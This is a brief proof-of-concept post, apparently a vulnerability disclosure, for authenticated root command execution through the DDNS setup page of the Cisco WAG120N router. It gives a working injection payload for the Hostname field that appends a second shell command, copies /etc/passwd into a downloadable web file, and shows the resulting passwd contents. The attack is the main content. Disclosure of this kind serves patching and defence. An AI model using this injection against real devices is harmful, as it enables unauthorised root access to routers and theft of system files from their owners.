Hello, here you have a quick POC in three simple steps
# Remote Command Execution on Cisco WAG120N.
# (Not tested in other routers)
#
# Manuel Fernández Fernández (thesur@itsm3.com)
#
# Greetings to 2x1 crew (Alberto, Dani, Luis, Juanmi, Juanito & oca)
1º Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm
2º All the fields you see are vulnerables to command execution as root, so
inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname
field
3º Everything is done, just download the file /Routercfg.cfg (Authenticated
is requiered)
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
--
Manuel Fernández
